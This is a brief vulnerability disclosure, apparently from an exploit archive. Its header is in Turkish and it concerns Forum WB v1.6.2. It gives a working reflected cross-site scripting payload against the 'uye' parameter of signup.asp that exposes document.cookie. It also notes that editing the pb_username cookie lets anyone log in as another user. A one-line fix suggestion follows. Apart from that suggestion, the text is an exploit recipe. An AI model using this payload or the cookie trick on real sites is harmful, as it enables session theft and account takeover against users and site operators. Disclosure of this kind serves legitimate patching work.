< ------------------- header data start ------------------- >

#############################################################

# Application Name : Forum WB v1.6.2 ~ XSS Bug

# Vulnerable Type : Cross Site Scripting

# Infection : pb%5Fusername adli cookie degeri istenilen kullanici adi ile degistirilerek, o kullanici tarafli login olunabilir.

# Bug Fix Advice : signup.asp dosyasindaki uye parametresi gerekli filtrelemeler yapilmali.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

signup.asp?xx=ok&uye=><script>alert(document.cookie)</script>

< -- bug code end of -- >